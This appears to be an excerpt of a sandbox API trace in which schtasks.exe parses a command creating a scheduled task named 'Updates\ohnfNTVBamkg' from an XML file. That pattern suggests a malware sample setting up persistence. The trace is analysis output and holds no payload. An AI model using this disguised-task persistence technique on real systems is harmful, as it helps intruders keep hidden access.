[0223.176] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.176] lstrlenW (lpString="hresult") returned 7
[0223.176] RtlRestoreLastWin32Error () returned 0x0
[0223.176] RtlRestoreLastWin32Error () returned 0x0
[0223.176] lstrlenW (lpString="/Create") returned 7
[0223.176] lstrlenW (lpString="-/") returned 2
[0223.176] StrChrIW (lpStart="-/", wMatch=0x78002f) returned="/"
[0223.176] lstrlenW (lpString="create") returned 6
[0223.176] lstrlenW (lpString="create") returned 6
[0223.176] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.176] lstrlenW (lpString="Create") returned 6
[0223.176] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.176] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8
[0223.176] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|Create|") returned 8
[0223.176] lstrlenW (lpString="|create|") returned 8
[0223.176] lstrlenW (lpString="|Create|") returned 8
[0223.176] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|"
[0223.176] RtlRestoreLastWin32Error () returned 0x0
[0223.176] RtlRestoreLastWin32Error () returned 0x0
[0223.176] RtlRestoreLastWin32Error () returned 0x0
[0223.176] lstrlenW (lpString="/TN") returned 3
[0223.176] lstrlenW (lpString="-/") returned 2
[0223.176] StrChrIW (lpStart="-/", wMatch=0x78002f) returned="/"
[0223.176] lstrlenW (lpString="create") returned 6
[0223.176] lstrlenW (lpString="create") returned 6
[0223.176] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.176] lstrlenW (lpString="TN") returned 2
[0223.176] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.176] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8
[0223.176] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0223.177] lstrlenW (lpString="|create|") returned 8
[0223.177] lstrlenW (lpString="|TN|") returned 4
[0223.177] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0
[0223.177] RtlRestoreLastWin32Error () returned 0x490
[0223.177] lstrlenW (lpString="?") returned 1
[0223.177] lstrlenW (lpString="?") returned 1
[0223.177] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.177] lstrlenW (lpString="TN") returned 2
[0223.177] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.177] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3
[0223.177] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0223.177] lstrlenW (lpString="|?|") returned 3
[0223.177] lstrlenW (lpString="|TN|") returned 4
[0223.177] RtlRestoreLastWin32Error () returned 0x490
[0223.177] lstrlenW (lpString="s") returned 1
[0223.177] lstrlenW (lpString="s") returned 1
[0223.177] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.177] lstrlenW (lpString="TN") returned 2
[0223.177] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.177] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3
[0223.177] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0223.177] lstrlenW (lpString="|s|") returned 3
[0223.177] lstrlenW (lpString="|TN|") returned 4
[0223.177] RtlRestoreLastWin32Error () returned 0x490
[0223.177] lstrlenW (lpString="u") returned 1
[0223.177] lstrlenW (lpString="u") returned 1
[0223.177] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.177] lstrlenW (lpString="TN") returned 2
[0223.177] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.178] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3
[0223.178] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0223.178] lstrlenW (lpString="|u|") returned 3
[0223.178] lstrlenW (lpString="|TN|") returned 4
[0223.178] RtlRestoreLastWin32Error () returned 0x490
[0223.178] lstrlenW (lpString="p") returned 1
[0223.178] lstrlenW (lpString="p") returned 1
[0223.178] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.178] lstrlenW (lpString="TN") returned 2
[0223.178] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.178] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3
[0223.178] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0223.178] lstrlenW (lpString="|p|") returned 3
[0223.178] lstrlenW (lpString="|TN|") returned 4
[0223.178] RtlRestoreLastWin32Error () returned 0x490
[0223.178] lstrlenW (lpString="ru") returned 2
[0223.178] lstrlenW (lpString="ru") returned 2
[0223.178] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.178] lstrlenW (lpString="TN") returned 2
[0223.178] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.178] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4
[0223.178] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0223.178] lstrlenW (lpString="|ru|") returned 4
[0223.178] lstrlenW (lpString="|TN|") returned 4
[0223.178] StrStrIW (lpFirst="|ru|", lpSrch="|TN|") returned 0x0
[0223.178] RtlRestoreLastWin32Error () returned 0x490
[0223.178] lstrlenW (lpString="rp") returned 2
[0223.179] lstrlenW (lpString="rp") returned 2
[0223.179] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.179] lstrlenW (lpString="TN") returned 2
[0223.179] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.179] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4
[0223.179] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0223.179] lstrlenW (lpString="|rp|") returned 4
[0223.179] lstrlenW (lpString="|TN|") returned 4
[0223.179] StrStrIW (lpFirst="|rp|", lpSrch="|TN|") returned 0x0
[0223.179] RtlRestoreLastWin32Error () returned 0x490
[0223.179] lstrlenW (lpString="sc") returned 2
[0223.179] lstrlenW (lpString="sc") returned 2
[0223.179] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.179] lstrlenW (lpString="TN") returned 2
[0223.179] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.179] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4
[0223.179] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0223.179] lstrlenW (lpString="|sc|") returned 4
[0223.179] lstrlenW (lpString="|TN|") returned 4
[0223.179] StrStrIW (lpFirst="|sc|", lpSrch="|TN|") returned 0x0
[0223.179] RtlRestoreLastWin32Error () returned 0x490
[0223.179] lstrlenW (lpString="mo") returned 2
[0223.179] lstrlenW (lpString="mo") returned 2
[0223.179] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.180] lstrlenW (lpString="TN") returned 2
[0223.180] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.180] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4
[0223.180] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0223.180] lstrlenW (lpString="|mo|") returned 4
[0223.180] lstrlenW (lpString="|TN|") returned 4
[0223.180] StrStrIW (lpFirst="|mo|", lpSrch="|TN|") returned 0x0
[0223.180] RtlRestoreLastWin32Error () returned 0x490
[0223.180] lstrlenW (lpString="d") returned 1
[0223.180] lstrlenW (lpString="d") returned 1
[0223.180] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.180] lstrlenW (lpString="TN") returned 2
[0223.180] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.180] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3
[0223.180] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0223.181] lstrlenW (lpString="|d|") returned 3
[0223.181] lstrlenW (lpString="|TN|") returned 4
[0223.181] RtlRestoreLastWin32Error () returned 0x490
[0223.181] lstrlenW (lpString="m") returned 1
[0223.181] lstrlenW (lpString="m") returned 1
[0223.181] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.181] lstrlenW (lpString="TN") returned 2
[0223.181] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.181] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3
[0223.181] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0223.182] lstrlenW (lpString="|m|") returned 3
[0223.182] lstrlenW (lpString="|TN|") returned 4
[0223.182] RtlRestoreLastWin32Error () returned 0x490
[0223.182] lstrlenW (lpString="i") returned 1
[0223.182] lstrlenW (lpString="i") returned 1
[0223.182] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.182] lstrlenW (lpString="TN") returned 2
[0223.182] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.182] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3
[0223.182] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0223.182] lstrlenW (lpString="|i|") returned 3
[0223.182] lstrlenW (lpString="|TN|") returned 4
[0223.182] RtlRestoreLastWin32Error () returned 0x490
[0223.182] lstrlenW (lpString="tn") returned 2
[0223.182] lstrlenW (lpString="tn") returned 2
[0223.182] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.182] lstrlenW (lpString="TN") returned 2
[0223.182] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.182] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4
[0223.182] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0223.182] lstrlenW (lpString="|tn|") returned 4
[0223.183] lstrlenW (lpString="|TN|") returned 4
[0223.183] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|"
[0223.183] RtlRestoreLastWin32Error () returned 0x0
[0223.183] RtlRestoreLastWin32Error () returned 0x0
[0223.183] lstrlenW (lpString="Updates\\ohnfNTVBamkg") returned 20
[0223.183] lstrlenW (lpString="-/") returned 2
[0223.183] StrChrIW (lpStart="-/", wMatch=0x780055) returned 0x0
[0223.183] RtlRestoreLastWin32Error () returned 0x490
[0223.183] RtlRestoreLastWin32Error () returned 0x490
[0223.183] RtlRestoreLastWin32Error () returned 0x0
[0223.183] lstrlenW (lpString="Updates\\ohnfNTVBamkg") returned 20
[0223.183] StrChrIW (lpStart="Updates\\ohnfNTVBamkg", wMatch=0x3a) returned 0x0
[0223.183] RtlRestoreLastWin32Error () returned 0x490
[0223.183] RtlRestoreLastWin32Error () returned 0x0
[0223.183] lstrlenW (lpString="Updates\\ohnfNTVBamkg") returned 20
[0223.183] RtlRestoreLastWin32Error () returned 0x0
[0223.183] RtlRestoreLastWin32Error () returned 0x0
[0223.183] lstrlenW (lpString="/XML") returned 4
[0223.183] lstrlenW (lpString="-/") returned 2
[0223.183] StrChrIW (lpStart="-/", wMatch=0x78002f) returned="/"
[0223.183] lstrlenW (lpString="create") returned 6
[0223.183] lstrlenW (lpString="create") returned 6
[0223.183] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.183] lstrlenW (lpString="XML") returned 3
[0223.183] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.183] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8
[0223.183] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.184] lstrlenW (lpString="|create|") returned 8
[0223.184] lstrlenW (lpString="|XML|") returned 5
[0223.184] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0
[0223.184] RtlRestoreLastWin32Error () returned 0x490
[0223.184] lstrlenW (lpString="?") returned 1
[0223.184] lstrlenW (lpString="?") returned 1
[0223.184] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.184] lstrlenW (lpString="XML") returned 3
[0223.184] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.184] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3
[0223.184] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.184] lstrlenW (lpString="|?|") returned 3
[0223.184] lstrlenW (lpString="|XML|") returned 5
[0223.184] RtlRestoreLastWin32Error () returned 0x490
[0223.184] lstrlenW (lpString="s") returned 1
[0223.184] lstrlenW (lpString="s") returned 1
[0223.184] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.184] lstrlenW (lpString="XML") returned 3
[0223.184] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.184] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3
[0223.184] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.185] lstrlenW (lpString="|s|") returned 3
[0223.185] lstrlenW (lpString="|XML|") returned 5
[0223.185] RtlRestoreLastWin32Error () returned 0x490
[0223.185] lstrlenW (lpString="u") returned 1
[0223.185] lstrlenW (lpString="u") returned 1
[0223.185] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.185] lstrlenW (lpString="XML") returned 3
[0223.185] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.185] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3
[0223.185] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.185] lstrlenW (lpString="|u|") returned 3
[0223.185] lstrlenW (lpString="|XML|") returned 5
[0223.185] RtlRestoreLastWin32Error () returned 0x490
[0223.185] lstrlenW (lpString="p") returned 1
[0223.185] lstrlenW (lpString="p") returned 1
[0223.185] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.185] lstrlenW (lpString="XML") returned 3
[0223.185] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.185] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3
[0223.185] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.185] lstrlenW (lpString="|p|") returned 3
[0223.185] lstrlenW (lpString="|XML|") returned 5
[0223.185] RtlRestoreLastWin32Error () returned 0x490
[0223.185] lstrlenW (lpString="ru") returned 2
[0223.185] lstrlenW (lpString="ru") returned 2
[0223.185] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.186] lstrlenW (lpString="XML") returned 3
[0223.186] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.186] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4
[0223.186] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.186] lstrlenW (lpString="|ru|") returned 4
[0223.186] lstrlenW (lpString="|XML|") returned 5
[0223.186] RtlRestoreLastWin32Error () returned 0x490
[0223.186] lstrlenW (lpString="rp") returned 2
[0223.186] lstrlenW (lpString="rp") returned 2
[0223.186] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.186] lstrlenW (lpString="XML") returned 3
[0223.186] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.186] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4
[0223.186] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.186] lstrlenW (lpString="|rp|") returned 4
[0223.186] lstrlenW (lpString="|XML|") returned 5
[0223.186] RtlRestoreLastWin32Error () returned 0x490
[0223.186] lstrlenW (lpString="sc") returned 2
[0223.186] lstrlenW (lpString="sc") returned 2
[0223.186] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.186] lstrlenW (lpString="XML") returned 3
[0223.186] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.186] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4
[0223.187] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.187] lstrlenW (lpString="|sc|") returned 4
[0223.187] lstrlenW (lpString="|XML|") returned 5
[0223.187] RtlRestoreLastWin32Error () returned 0x490
[0223.187] lstrlenW (lpString="mo") returned 2
[0223.187] lstrlenW (lpString="mo") returned 2
[0223.187] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.187] lstrlenW (lpString="XML") returned 3
[0223.187] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.187] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4
[0223.187] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.187] lstrlenW (lpString="|mo|") returned 4
[0223.187] lstrlenW (lpString="|XML|") returned 5
[0223.187] RtlRestoreLastWin32Error () returned 0x490
[0223.187] lstrlenW (lpString="d") returned 1
[0223.187] lstrlenW (lpString="d") returned 1
[0223.187] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.187] lstrlenW (lpString="XML") returned 3
[0223.187] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.187] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3
[0223.187] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.187] lstrlenW (lpString="|d|") returned 3
[0223.187] lstrlenW (lpString="|XML|") returned 5
[0223.187] RtlRestoreLastWin32Error () returned 0x490
[0223.187] lstrlenW (lpString="m") returned 1
[0223.188] lstrlenW (lpString="m") returned 1
[0223.188] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.188] lstrlenW (lpString="XML") returned 3
[0223.188] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.188] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3
[0223.188] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.188] lstrlenW (lpString="|m|") returned 3
[0223.188] lstrlenW (lpString="|XML|") returned 5
[0223.188] RtlRestoreLastWin32Error () returned 0x490
[0223.188] lstrlenW (lpString="i") returned 1
[0223.188] lstrlenW (lpString="i") returned 1
[0223.188] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.188] lstrlenW (lpString="XML") returned 3
[0223.188] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.188] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3
[0223.188] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.188] lstrlenW (lpString="|i|") returned 3
[0223.188] lstrlenW (lpString="|XML|") returned 5
[0223.188] RtlRestoreLastWin32Error () returned 0x490
[0223.188] lstrlenW (lpString="tn") returned 2
[0223.188] lstrlenW (lpString="tn") returned 2
[0223.188] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.188] lstrlenW (lpString="XML") returned 3
[0223.188] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.189] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4
[0223.189] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.189] lstrlenW (lpString="|tn|") returned 4
[0223.189] lstrlenW (lpString="|XML|") returned 5
[0223.189] RtlRestoreLastWin32Error () returned 0x490
[0223.189] lstrlenW (lpString="tr") returned 2
[0223.189] lstrlenW (lpString="tr") returned 2
[0223.189] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.189] lstrlenW (lpString="XML") returned 3
[0223.189] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.189] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4
[0223.189] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.189] lstrlenW (lpString="|tr|") returned 4
[0223.189] lstrlenW (lpString="|XML|") returned 5
[0223.189] RtlRestoreLastWin32Error () returned 0x490
[0223.189] lstrlenW (lpString="st") returned 2
[0223.189] lstrlenW (lpString="st") returned 2
[0223.189] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.189] lstrlenW (lpString="XML") returned 3
[0223.189] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.189] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|st|") returned 4
[0223.189] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.189] lstrlenW (lpString="|st|") returned 4
[0223.189] lstrlenW (lpString="|XML|") returned 5
[0223.189] RtlRestoreLastWin32Error () returned 0x490
[0223.189] lstrlenW (lpString="sd") returned 2
[0223.190] lstrlenW (lpString="sd") returned 2
[0223.190] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.190] lstrlenW (lpString="XML") returned 3
[0223.190] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.190] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sd|") returned 4
[0223.190] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.190] lstrlenW (lpString="|sd|") returned 4
[0223.190] lstrlenW (lpString="|XML|") returned 5
[0223.190] RtlRestoreLastWin32Error () returned 0x490
[0223.190] lstrlenW (lpString="ed") returned 2
[0223.190] lstrlenW (lpString="ed") returned 2
[0223.190] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.190] lstrlenW (lpString="XML") returned 3
[0223.190] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.190] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ed|") returned 4
[0223.190] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.190] lstrlenW (lpString="|ed|") returned 4
[0223.190] lstrlenW (lpString="|XML|") returned 5
[0223.190] RtlRestoreLastWin32Error () returned 0x490
[0223.190] lstrlenW (lpString="it") returned 2
[0223.190] lstrlenW (lpString="it") returned 2
[0223.190] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.190] lstrlenW (lpString="XML") returned 3
[0223.190] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.191] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|it|") returned 4
[0223.191] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0223.191] lstrlenW (lpString="|it|") returned 4
[0223.191] lstrlenW (lpString="|XML|") returned 5
[0223.191] RtlRestoreLastWin32Error () returned 0x490
[0223.191] lstrlenW (lpString="et") returned 2
[0223.191] lstrlenW (lpString="et") returned 2
[0223.191] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.191] lstrlenW (lpString="XML") returned 3
[0223.191] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.191] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|et|") returned 4
